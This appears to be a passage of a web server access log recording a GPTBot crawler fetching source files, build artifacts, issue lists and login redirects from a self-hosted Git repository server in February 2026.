"/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:15:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:15:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 20700] [Gzip 10.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11140] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/index.html" [Client 74.7.227.38] [Length 4480] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" +[17/Feb/2026:17:15:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:15:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=all&type=all" +[17/Feb/2026:17:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56427] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" +[17/Feb/2026:17:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56425] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" +[17/Feb/2026:17:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481683] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" +[17/Feb/2026:17:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176815] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" +[17/Feb/2026:17:15:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:15:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481683] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" +[17/Feb/2026:17:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56427] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" +[17/Feb/2026:17:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" +[17/Feb/2026:17:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" +[17/Feb/2026:17:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:17:15:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/components/Services.tsx" +[17/Feb/2026:17:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19508] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" +[17/Feb/2026:17:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11915] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" +[17/Feb/2026:17:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets?display=source" [Client 74.7.227.38] [Length 11812] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:17:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props?display=source" [Client 74.7.227.38] [Length 12001] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:17:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:17:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10325] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10517] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 11049] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:17:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:17:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11379] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10988] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11375] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10988] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 12771] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 20105] [Gzip 6.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 